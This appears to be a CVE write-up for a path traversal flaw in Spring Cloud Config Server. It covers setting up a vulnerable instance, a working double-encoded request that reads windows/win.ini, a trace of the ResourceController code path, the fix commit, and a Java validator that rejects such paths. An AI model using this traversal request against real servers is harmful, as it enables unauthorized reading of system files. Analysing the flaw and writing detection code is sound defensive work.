In IDEA, add the following to pom.xml:
<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-config-server</artifactId>
<version>2.0.2.RELEASE</version>
</dependency>
Configure application.properties:
server.port=8888
spring.cloud.config.server.git.uri=https://github.com/SukaraLin/awesome-cve-poc.git
After that, request:
http://127.0.0.1:8888/aaa/bbb/master/..%252F..%252F..%252F..%252F..%252F..%252Fwindows/win.ini
Spring Cloud Config Server provides distributed configuration management for Spring; clients can retrieve configuration values over HTTP. The route that matches the payload is in `org.springframework.cloud.config.server.resource.ResourceController#retrieve()`:
@RequestMapping({"/{name}/{profile}/{label}/**"})
public String retrieve(@PathVariable String name, @PathVariable String profile, @PathVariable String label, HttpServletRequest request, @RequestParam(defaultValue = "true") boolean resolvePlaceholders) throws IOException {
    String path = this.getFilePath(request, name, profile, label);
    return this.retrieve(name, profile, label, path, resolvePlaceholders);
}
`{name}/{profile}/{label}`: name corresponds to the repository name, and profile corresponds to … In actual testing, name, profile, and label are all required. Debug `getFilePath`.
From here, continue following `retrieve()`, then step into the next `retrieve()`; the path here:
Next comes findOne, located in `org.springframework.cloud.config.server.resource.GenericResourceRepository#findOne`.
The locations list is file:/C:/Users/icu/AppData/Local/Temp/config-repo-6608031716294156148/, and the resource is fetched from there.
https://github.com/spring-cloud/spring-cloud-config/commit/3632fc6f64e567286c42c5a2f1b8142bfde505c2
Special characters such as % are URL-decoded, and then `../`, `..`, `/`, etc. are matched.
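The decode-then-check idea described above, as an added example (not the project's patch code): a validator that decodes repeatedly before looking for `..` segments and then confirms the resolved path stays under the base directory. `ResourcePathCheck`, `fullyDecode`, `isSafe` and the `config-repo` directory are names assumed for illustration.

```java
import java.io.UnsupportedEncodingException;
import java.net.URLDecoder;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.Paths;
public class ResourcePathCheck {
    // Decode until stable (max 5 rounds) so ..%252F and ..%2F both become ../ before checking.
    static String fullyDecode(String path) throws UnsupportedEncodingException {
        String current = path;
        for (int i = 0; i < 5; i++) {
            String decoded;
            try {
                decoded = URLDecoder.decode(current, "UTF-8"); // also maps '+' to space; validation only
            } catch (IllegalArgumentException e) {
                return null; // malformed % escape
            }
            if (decoded.equals(current)) return decoded;
            current = decoded;
        }
        return null; // still changing after 5 rounds
    }

    // True only if the fully decoded path has no ".." segment and stays under baseDir.
    static boolean isSafe(Path baseDir, String requestPath) throws UnsupportedEncodingException {
        String decoded = fullyDecode(requestPath);
        if (decoded == null || decoded.indexOf('\0') >= 0) return false;
        String normalized = decoded.replace('\\', '/');
        for (String segment : normalized.split("/")) {
            if (segment.equals("..")) return false;
        }
        try {
            Path base = baseDir.toAbsolutePath().normalize();
            Path target = base.resolve(normalized.replaceFirst("^/+", "")).normalize();
            return target.startsWith(base);
        } catch (InvalidPathException e) {
            return false; // characters the file system cannot represent
        }
    }

    public static void main(String[] args) throws Exception {
        Path base = Paths.get("config-repo"); // constructed base directory
        String[] samples = { // constructed inputs; the second is the request path from the write-up
            "application.yml",
            "..%252F..%252F..%252F..%252F..%252F..%252Fwindows/win.ini",
            "..%2F..%2Fwindows/win.ini",
            "conf/..%5C..%5Csecret.txt" };
        for (String s : samples) System.out.println((isSafe(base, s) ? "allow   " : "reject  ") + s);
    }
}
```

Only `application.yml` is allowed; the three other samples are rejected whether the traversal is encoded once, twice, or written with backslashes.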